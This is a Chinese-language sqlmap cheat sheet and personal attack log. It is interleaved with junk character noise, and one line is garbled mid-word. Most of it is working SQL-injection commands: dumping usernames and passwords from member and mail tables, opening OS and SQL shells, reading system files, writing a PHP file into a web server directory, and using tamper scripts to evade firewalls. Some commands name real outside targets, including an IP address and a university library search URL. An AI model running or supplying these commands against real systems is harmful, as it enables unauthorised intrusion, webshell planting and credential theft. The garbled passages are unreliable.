sqlmap使用实例

admin

/pentest/database/sqlmap
  F4 l5 d5 b; Q1 ]7 }6 f0 _& H) G
update :::::>     in the folder   after  execute    following   order : svn update

sqlmap.py -r 1.txt --current-db

v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”

==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
4 [( \- [# D) M3 }: e猜解数据库
./sqlmap.py -u "injection-url" --dbs
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"

- Y% A/ z. v. [. R  f猜解表名
./sqlmap.py -u "injection-url" -D database_name --tables
# ]$ u) t8 _; Y$ _
1 t1 _" |. ?# D$ y# u" Psqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
" R- S) {( D  b5 y- g+ F8 |sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"

sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
7 ]; B1 G. J9 |6 R$ S' x
9 m# ^4 q! e5 s/ G& v% b5 Ysqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
7 W+ \8 d2 z/ V" Dsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"

2 h# n* A# L8 Q2 ~& w, Gsqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
5 ~, }0 F' {: Ysqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
3 I0 d/ \( }8 C& j& E+ Rsqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump

sqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
: H& N2 o' P& |. m" f4 lsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"

sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
猜解列名
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns

sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
% c2 G( D3 U" C+ L/ i; `sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
5 Y$ C: y% C. h, T- `- B4 g9 x  Y
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
7 w8 ~  H' Y& T; g&submit=Go
1 `% H; L7 Z" f6 B; h猜解值
8 T8 r, @# x- w/ F$ I; _3 |./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
( Z, d2 P" x' C7 w========================================================
$ j! L- @1 p  ^+ r搜索表名中包括mana字符的
/sqlmap.py -u "injection-url" -T mana --search
返回一个交互式sql shell
3 ~. ?$ g" L8 X+ E# c- X1 e/ C/sqlmap.py -u "injection-url" --sql-shell
读取指定文件（需权限）
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
3 J' R6 x- x* q& U7 d& J: O查看当前 用户 及 数据库
/sqlmap.py -u "injection-url" --current-user --current-db
& R4 g$ n* }+ }3 ?本地文件 写入 远程目标绝对路径
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"

$ Z6 L( M' J7 }# @& H3 Isqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
查看某用的权限
/sqlmap.py -u "injection-url" --privileges -U root
查看当前用户是否为dba
/sqlmap.py -u "injection-url" --is-dba
- l4 e' B( f- i- X) x8 ]) p读取所有数据库用户或指定数据库用户的密码
sqlmap.py -r 1.txt --users --passwords
7 u9 }* H( c1 l$ v2 y4 ysqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
5 m* C/ R  E* q- V+ t+ N
4 j7 U7 N" G# _/sqlmap.py -u "injection-url" --passwords -U root

--start&&--stop 与 --first&&--last 的区别
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   （--start=1 --stop=2 会列出第二条记录。。。。记录例如：0 1 2 3 ……）

" N% p- Q; x/ P. U  @. J7 p* }从字典中查找(属于暴利破解)存在的表（sqlmap/txt/common-tables.txt）或字段（sqlmap/txt/common-columns.txt）
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
3 x; s0 D3 j) L4 {/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
5 Y5 y% e4 u0 H" N; p! Z6 B
执行sql语句，如查询@@datadir得到数据库路径（或者user()/database()等等……）
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
9 Z2 _' L4 X* U6 D6 g  v7 O